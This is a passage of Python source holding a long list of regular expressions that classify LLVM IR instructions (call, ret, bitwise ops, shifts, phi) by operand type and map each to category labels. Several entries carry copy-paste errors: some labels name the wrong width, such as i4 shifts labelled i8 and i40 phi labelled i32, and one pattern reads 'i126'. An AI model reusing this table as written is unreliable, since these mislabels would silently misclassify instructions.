['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i4\*\* .*', 'i4** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i8\*\* .*', 'i8** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i16\*\* .*', 'i16** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i32\*\* .*', 'i32** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i64\*\* .*', 'i64** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i128\*\* .*', 'i128** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*x86_fp80 .*', 'float operation',
'floating point operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*float .*', 'float operation',
'floating point operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*double .*', 'double operation',
'floating point operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*x86_fp80\* .*', 'float* operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*float\* .*', 'float* operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*double\* .*', 'double* operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*x86_fp80\*\* .*', 'float** operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*float\*\* .*', 'float** operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*double\*\* .*', 'double** operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*%".*', 'struct/class op', 'struct/class op'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<%.*', 'struct/class op', 'struct/class op'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*opaque.*', 'struct/class op',
'struct/class op'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i1> .*', '<d x i1> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i2> .*', '<d x i2> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i4> .*', '<d x i4> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i8> .*', '<d x i8> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i16> .*', '<d x i16> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i32> .*', '<d x i32> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i64> .*', '<d x i64> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i128> .*', '<d x i128> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x x86_fp80> .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x float> .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x double> .*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i1>\* .*', '<d x i1>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i2>\* .*', '<d x i2>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i4>\* .*', '<d x i4>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i8>\* .*', '<d x i8>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i16>\* .*', '<d x i16>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i32>\* .*', '<d x i32>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i64>\* .*', '<d x i64>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i128>\* .*', '<d x i128>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x x86_fp80>\* .*',
'<d x float>* operation', '<d x floating point>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x float>\* .*', '<d x float>* operation',
'<d x floating point>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x double>\* .*', '<d x double>* operation',
'<d x floating point>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i1\] .*', '[d x i1] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i2\] .*', '[d x i2] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i4\] .*', '[d x i4] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i8\] .*', '[d x i8] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i16\] .*', '[d x i16] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i32\] .*', '[d x i32] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i64\] .*', '[d x i64] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i128\] .*', '[d x i128] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x x86_fp80\] .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x float\] .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x double\] .*', '[d x double] operation',
'[d x floating point] operation'],
['ret i1 .*', 'i1 operation', 'int operation'],
['ret i2 .*', 'i2 operation', 'int operation'],
['ret i4 .*', 'i4 operation', 'int operation'],
['ret i8 .*', 'i8 operation', 'int operation'],
['ret i16 .*', 'i16 operation', 'int operation'],
['ret i32 .*', 'i32 operation', 'int operation'],
['ret i64 .*', 'i64 operation', 'int operation'],
['ret i128 .*', 'i128 operation', 'int operation'],
['ret i1\* .*', 'i1* operation', 'int* operation'],
['ret i2\* .*', 'i2* operation', 'int* operation'],
['ret i4\* .*', 'i4* operation', 'int* operation'],
['ret i8\* .*', 'i8* operation', 'int* operation'],
['ret i16\* .*', 'i16* operation', 'int* operation'],
['ret i32\* .*', 'i32* operation', 'int* operation'],
['ret i64\* .*', 'i64* operation', 'int* operation'],
['ret i128\* .*', 'i128* operation', 'int* operation'],
['ret x86_fp80 .*', 'x86_fp80 operation', 'floating point operation'],
['ret float .*', 'float operation', 'floating point operation'],
['ret double .*', 'double operation', 'floating point operation'],
['ret x86_fp80\* .*', 'x86_fp80* operation', 'floating point* operation'],
['ret float\* .*', 'float* operation', 'floating point* operation'],
['ret double\* .*', 'double* operation', 'floating point* operation'],
['ret %".*', 'struct/class op', 'struct/class op'],
['ret <%.*', 'struct/class op', 'struct/class op'],
['ret <?{.*', 'struct/class op', 'struct/class op'],
['ret opaque.*', 'struct/class op', 'struct/class op'],
['ret <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['ret <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['ret <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['ret <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['ret <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['ret <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['ret <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['ret <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['ret <\d+ x x86_fp80> .*', '<d x x86_fp80> operation', '<d x floating point> operation'],
['ret <\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['ret <\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['ret <\d+ x i1>\* .*', '<d x i1>* operation', '<d x int>* operation'],
['ret <\d+ x i2>\* .*', '<d x i2>* operation', '<d x int>* operation'],
['ret <\d+ x i4>\* .*', '<d x i4>* operation', '<d x int>* operation'],
['ret <\d+ x i8>\* .*', '<d x i8>* operation', '<d x int>* operation'],
['ret <\d+ x i16>\* .*', '<d x i16>* operation', '<d x int>* operation'],
['ret <\d+ x i32>\* .*', '<d x i32>* operation', '<d x int>* operation'],
['ret <\d+ x i64>\* .*', '<d x i64>* operation', '<d x int>* operation'],
['ret <\d+ x i128>\* .*', '<d x i128>* operation', '<d x int>* operation'],
['ret <\d+ x x86_fp80>\* .*', '<d x x86_fp80>* operation', '<d x floating point>* operation'],
['ret <\d+ x float>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['ret <\d+ x double>\* .*', '<d x double>* operation', '<d x floating point>* operation'],
['ret \[\d+ x i1\] .*', '[d x i1] operation', '[d x int] operation'],
['ret \[\d+ x i2\] .*', '[d x i2] operation', '[d x int] operation'],
['ret \[\d+ x i4\] .*', '[d x i4] operation', '[d x int] operation'],
['ret \[\d+ x i8\] .*', '[d x i8] operation', '[d x int] operation'],
['ret \[\d+ x i16\] .*', '[d x i16] operation', '[d x int] operation'],
['ret \[\d+ x i32\] .*', '[d x i32] operation', '[d x int] operation'],
['ret \[\d+ x i64\] .*', '[d x i64] operation', '[d x int] operation'],
['ret \[\d+ x i128\] .*', '[d x i128] operation', '[d x int] operation'],
['ret \[\d+ x x86_fp80\] .*', '[d x x86_fp80] operation', '[d x floating point] operation'],
['ret \[\d+ x float\] .*', '[d x float] operation', '[d x floating point] operation'],
['ret \[\d+ x double\] .*', '[d x double] operation', '[d x floating point] operation'],
["<%ID> = and i1 .*", 'i1 operation', 'int operation'],
["<%ID> = and <\d+ x i1> .*", '<d x i1> operation', '<d x int> operation'],
["<%ID> = and i2 .*", 'i2 operation', 'int operation'],
["<%ID> = and <\d+ x i2> .*", '<d x i2> operation', '<d x int> operation'],
["<%ID> = and i4 .*", 'i4 operation', 'int operation'],
["<%ID> = and <\d+ x i4> .*", '<d x i4> operation', '<d x int> operation'],
["<%ID> = and i8 .*", 'i8 operation', 'int operation'],
["<%ID> = and <\d+ x i8> .*", '<d x i8> operation', '<d x int> operation'],
["<%ID> = and i16 .*", 'i16 operation', 'int operation'],
["<%ID> = and <\d+ x i16> .*", '<d x i16> operation', '<d x int> operation'],
["<%ID> = and i24 .*", 'i24 operation', 'int operation'],
["<%ID> = and <\d+ x i24> .*", '<d x i24> operation', '<d x int> operation'],
["<%ID> = and i32 .*", 'i32 operation', 'int operation'],
["<%ID> = and <\d+ x i32> .*", '<d x i32> operation', '<d x int> operation'],
["<%ID> = and i40 .*", 'i40 operation', 'int operation'],
["<%ID> = and <\d+ x i40> .*", '<d x i40> operation', '<d x int> operation'],
["<%ID> = and i64 .*", 'i64 operation', 'int operation'],
["<%ID> = and <\d+ x i64> .*", '<d x i64> operation', '<d x int> operation'],
["<%ID> = and i128 .*", 'i128 operation', 'int operation'],
["<%ID> = and <\d+ x i128> .*", '<d x i128> operation', '<d x int> operation'],
["<%ID> = or i1 .*", 'i1 operation', 'int operation'],
["<%ID> = or <\d+ x i1> .*", '<d x i1> operation', '<d x int> operation'],
["<%ID> = or i2 .*", 'i2 operation', 'int operation'],
["<%ID> = or <\d+ x i2> .*", '<d x i2> operation', '<d x int> operation'],
["<%ID> = or i4 .*", 'i4 operation', 'int operation'],
["<%ID> = or <\d+ x i4> .*", '<d x i4> operation', '<d x int> operation'],
["<%ID> = or i8 .*", 'i8 operation', 'int operation'],
["<%ID> = or <\d+ x i8> .*", '<d x i8> operation', '<d x int> operation'],
["<%ID> = or i16 .*", 'i16 operation', 'int operation'],
["<%ID> = or <\d+ x i16> .*", '<d x i16> operation', '<d x int> operation'],
["<%ID> = or i24 .*", 'i24 operation', 'int operation'],
["<%ID> = or <\d+ x i24> .*", '<d x i24> operation', '<d x int> operation'],
["<%ID> = or i32 .*", 'i32 operation', 'int operation'],
["<%ID> = or <\d+ x i32> .*", '<d x i32> operation', '<d x int> operation'],
["<%ID> = or i40 .*", 'i40 operation', 'int operation'],
["<%ID> = or <\d+ x i40> .*", '<d x i40> operation', '<d x int> operation'],
["<%ID> = or i64 .*", 'i64 operation', 'int operation'],
["<%ID> = or <\d+ x i64> .*", '<d x i64> operation', '<d x int> operation'],
["<%ID> = or i128 .*", 'i128 operation', 'int operation'],
["<%ID> = or <\d+ x i128> .*", '<d x i128> operation', '<d x int> operation'],
["<%ID> = xor i1 .*", 'i1 operation', 'int operation'],
["<%ID> = xor <\d+ x i1>.*", '<d x i1> operation', '<d x int> operation'],
["<%ID> = xor i4 .*", 'i4 operation', 'int operation'],
["<%ID> = xor <\d+ x i2>.*", '<d x i2> operation', '<d x int> operation'],
["<%ID> = xor i2 .*", 'i2 operation', 'int operation'],
["<%ID> = xor <\d+ x i4>.*", '<d x i4> operation', '<d x int> operation'],
["<%ID> = xor i8 .*", 'i8 operation', 'int operation'],
["<%ID> = xor <\d+ x i8>.*", '<d x i8> operation', '<d x int> operation'],
["<%ID> = xor i16 .*", 'i16 operation', 'int operation'],
["<%ID> = xor <\d+ x i16>.*", '<d x i16> operation', '<d x int> operation'],
["<%ID> = xor i24 .*", 'i16 operation', 'int operation'],
["<%ID> = xor <\d+ x i24>.*", '<d x i16> operation', '<d x int> operation'],
["<%ID> = xor i32 .*", 'i32 operation', 'int operation'],
["<%ID> = xor <\d+ x i32>.*", '<d x i32> operation', '<d x int> operation'],
["<%ID> = xor i40 .*", 'i40 operation', 'int operation'],
["<%ID> = xor <\d+ x i40>.*", '<d x i40> operation', '<d x int> operation'],
["<%ID> = xor i64 .*", 'i64 operation', 'int operation'],
["<%ID> = xor <\d+ x i64>.*", '<d x i64> operation', '<d x int> operation'],
["<%ID> = xor i128 .*", 'i128 operation', 'int operation'],
["<%ID> = xor <\d+ x i128>.*", '<d x i128> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i4 .*', 'i8 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i40 .*', 'i40 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i40> .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i256 .*', 'i256 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i256> .*', '<d x i256> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i40 .*', 'i40 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i40> .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i256 .*', 'i256 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i256> .*', '<d x i256> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i24 .*', 'i24 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i24> .*', '<d x i24> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i40 .*', 'i40 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i40> .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i256 .*', 'i256 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i256> .*', '<d x i256> operation', '<d x int> operation'],
['<%ID> = phi i1 .*', 'i1 operation', 'int operation'],
['<%ID> = phi <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i1\*> .*', '<d x i1*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i1>\* .*', '<d x i1>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i1\] .*', '[d x i1] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i1\]\* .*', '[d x i1]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i1\]\*\* .*', '[d x i1]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i1\]\*\*\* .*', '[d x i1]*** operation', '[d x int]*** operation'],
['<%ID> = phi i2 .*', 'i2 operation', 'int operation'],
['<%ID> = phi <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i2\*> .*', '<d x i2*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i2>\* .*', '<d x i2>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i2\] .*', '[d x i2] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i2\]\* .*', '[d x i2]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i2\]\*\* .*', '[d x i2]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i2\]\*\*\* .*', '[d x i2]*** operation', '[d x int]*** operation'],
['<%ID> = phi i4 .*', 'i4 operation', 'int operation'],
['<%ID> = phi <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i4\*> .*', '<d x i4*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i4>\* .*', '<d x i4>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i4\] .*', '[d x i4] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i4\]\* .*', '[d x i4]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i4\]\*\* .*', '[d x i4]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i4\]\*\*\* .*', '[d x i4]*** operation', '[d x int]*** operation'],
['<%ID> = phi i8 .*', 'i8 operation', 'int operation'],
['<%ID> = phi <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i8\*> .*', '<d x i8*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i8>\* .*', '<d x i8>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i8\] .*', '[d x i4] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i8\]\* .*', '[d x i4]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i8\]\*\* .*', '[d x i4]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i8\]\*\*\* .*', '[d x i4]*** operation', '[d x int]*** operation'],
['<%ID> = phi i16 .*', 'i16 operation', 'int operation'],
['<%ID> = phi <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i16\*> .*', '<d x i16*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i16>\* .*', '<d x i16>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i16\] .*', '[d x i16] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i16\]\* .*', '[d x i16]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i16\]\*\* .*', '[d x i16]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i16\]\*\*\* .*', '[d x i16]*** operation', '[d x int]*** operation'],
['<%ID> = phi i32 .*', 'i32 operation', 'int operation'],
['<%ID> = phi <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i32\*> .*', '<d x i32*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i32>\* .*', '<d x i32>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i32\] .*', '[d x i32] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i32\]\* .*', '[d x i32]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i32\]\*\* .*', '[d x i32]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i32\]\*\*\* .*', '[d x i32]*** operation', '[d x int]*** operation'],
['<%ID> = phi i40 .*', 'i32 operation', 'int operation'],
['<%ID> = phi <\d+ x i40> .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i40\*> .*', '<d x i40*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i40>\* .*', '<d x i40>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i40\] .*', '[d x i40] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i40\]\* .*', '[d x i40]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i40\]\*\* .*', '[d x i40]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i40\]\*\*\* .*', '[d x i40]*** operation', '[d x int]*** operation'],
['<%ID> = phi i64 .*', 'i64 operation', 'int operation'],
['<%ID> = phi <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i64\*> .*', '<d x i64*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i64>\* .*', '<d x i64>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i64\] .*', '[d x i64] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i64\]\* .*', '[d x i64]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i64\]\*\* .*', '[d x i64]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i64\]\*\*\* .*', '[d x i64]*** operation', '[d x int]*** operation'],
['<%ID> = phi i128 .*', 'i128 operation', 'int operation'],
['<%ID> = phi <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i128\*> .*', '<d x i128*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i128>\* .*', '<d x i128>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i128\] .*', '[d x i128] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i128\]\* .*', '[d x i128]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i126\]\*\* .*', '[d x i128]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i128\]\*\*\* .*', '[d x i128]*** operation', '[d x int]*** operation'],
['<%ID> = phi i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = phi i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = phi i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = phi i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = phi i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = phi i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = phi i40\* .*', 'i40* operation', 'int* operation'],
['<%ID> = phi i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = phi i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = phi i1\*\* .*', 'i1** operation', 'int** operation'],
['<%ID> = phi i2\*\* .*', 'i2** operation', 'int** operation'],
['<%ID> = phi i4\*\* .*', 'i4** operation', 'int** operation'],
['<%ID> = phi i8\*\* .*', 'i8** operation', 'int** operation'],
['<%ID> = phi i16\*\* .*', 'i16** operation', 'int** operation'],
['<%ID> = phi i32\*\* .*', 'i32** operation', 'int** operation'],
['<%ID> = phi i40\*\* .*', 'i40** operation', 'int** operation'],
['<%ID> = phi i64\*\* .*', 'i64** operation', 'int** operation'],
